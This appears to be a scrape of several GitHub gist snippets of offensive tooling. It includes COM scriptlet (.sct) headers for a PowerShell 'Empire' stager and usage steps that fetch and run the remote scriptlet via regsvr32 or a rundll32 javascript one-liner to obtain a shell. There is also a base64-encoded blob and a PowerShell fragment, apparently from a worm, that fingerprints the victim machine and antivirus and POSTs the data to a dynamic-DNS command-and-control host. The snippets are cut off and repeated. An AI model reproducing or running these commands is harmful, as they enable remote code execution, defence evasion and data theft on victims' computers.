This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $spl = '\';$vn = 'Guest';function info { try {$mch = [environment]::Machinename;$usr = [environment]::username;$HWD = (Get-WmiObject Win32_LogicalDisk).VolumeSerialNumber;$HWD = $HWD[0];$wi = (Get-WmiObject Win32_OperatingSystem).Caption;$wi = $wi + (Get-WmiObject Win32_OperatingSystem).OSArchitecture;$wi =$wi.replace('64-bit',' x64').replace('32-bit',' x86');$av = (Get-WmiObject -Namespace 'root/SecurityCenter2' -Class 'AntiVirusProduct').displayname;$e = $env:windir + '\Microsoft.NET\Framework\v2.0.50727\vbc.exe';if (test-path $e) {$nt = 'YES'} else {$nt= 'NO'}; if (test-path 'HKCU:\vdw0rm') {$usb = 'TRUE'} else { $usb = 'FALSE'};$u = $vn + '_' + $HWD + $spl + $mch + $spl + $usr + $spl + $wi + $spl + $av + $spl + $spl + $nt + $spl + $usb + $spl;return $u} catch {Start-Sleep -s 3}};function post ($cmdv, $v) { try { $enc = [system.Text.Encoding]::UTF8;$Req = [System.Net.HttpWebRequest]::Create('http://elmod.zapto.org:1166/' + $cmdv);$Req.Method = 'POST';$req.UserAgent = info;[System.IO.Stream]$stm;$stm = $Req |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 1. Create Empire Listener | |
| 2. Generate Stager | |
| 3. Host Stager Code At Some URL | |
| 4. Host .sct File At Some URL | |
| 5. On host, execute regsvr32.exe /i:http://server/empire.sct scrobj.dll | |
| 6. Instanitate the Object. ( ex: $s=New-Object -COM "Empire";$s.Exec() ) | |
| -Or This rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();s=new%20ActiveXObject("Empire");s.Exec(); | |
| 7. Wait for Shell... |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Empire" | |
| progid="Empire" | |
| version="1.00" | |
| classid="{00001111-0000-0000-0000-0000FEEDACDC}" | |
| > | |
| <!-- USAGE --> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Scripting.Dictionary" | |
| progid="Scripting.Dictionary" | |
| version="1" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| remotable="true" | |
| > |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 7b0HYBxJliUmL23Ke39K9UrX4HShCIBgEyTYkEAQ7MGIzeaS7B1pRyMpqyqBymVWZV1mFkDM7Z28995777333nvvvfe6O51OJ/ff/z9cZmQBbPbOStrJniGAqsgfP358Hz8ivvipP+nX+LV/jV/j1/h16P//9//9a/waf9evIc/vqT83PX8Q/f83+V3+nt/k1/jbfuyf/13/rl/z+T//u76ZF026qquLOluk02y5rNp0kqf1epkWy/Tpl6/TRTXLx7/xb5z8bgrj5emv8Ws8/zV/7V/jt/9f/53f28D9j36NX+vX/A1/zd/w1/g1fiv64zeTz/6CPfon/TUUsd9Tfv+1BG885uev8QfJ53/ob/hr0o/f8w9nAAzD/LQ/+HlKcL+LX35PAvkbeV/8Qvr/b0r//wN+jV8DH/9Gu7/Gr/E7eV/f+KS/xq/xG3h//gb097e9v8dt/q6ln3/ZbyFteay/ltdAPv4DxnVTT38Nxe33pP//JvT/3yZsRx//nuM6L6up4AqcGZYhsmv3JPyEyLUnP7/9a+CVX/fX+Ic+ovmgPn7NX4P//+v9Bh85nrjN8zvu/Dq/xn/9a/C7v/mv8WvU9GPV/Ga/xq+RJL9eRX8nv8av8R/8ukTZ/+DX+DW2aODJb/i7/BZ//G9LjX+j3+C3qR9S07/kN/htt35L+vwv+Q1+O/3529ff589/B/37d6z/Uf77d9K/f+f6d/818fcv0L9/lx8zvyT1lL/5XX7DX78i4ia/8W/xa2/91vLVb2Ta/Mb1L5E2v8mvX/028tFvar77zeo/W777zX/9inBMqt+OP9/67elH/ffTV7/N7/J7bv0O9Mcv/BbG+5th9L/mr/Hb/La/xq9Lg/41v/Vrbf0CHu+v8a1f47fc+bV+jce/Bk/Jb/5r/FL69tf5rf6vX/O3+b9o1Nsf/Rr1f0ig/iUSwV9r63dBLyn90/yuTLE/CE3lhd/wk1/j1//Wb7nza/4aJBWQV4ID5k8++TV+vW999Gv8Wn8Q/rDf/zr8 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Scripting.Dictionary" | |
| progid="Scripting.Dictionary" | |
| version="1" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| remotable="true" | |
| > |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Scripting.Dictionary" | |
| progid="Scripting.Dictionary" | |
| version="1" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| remotable="true" | |
| > |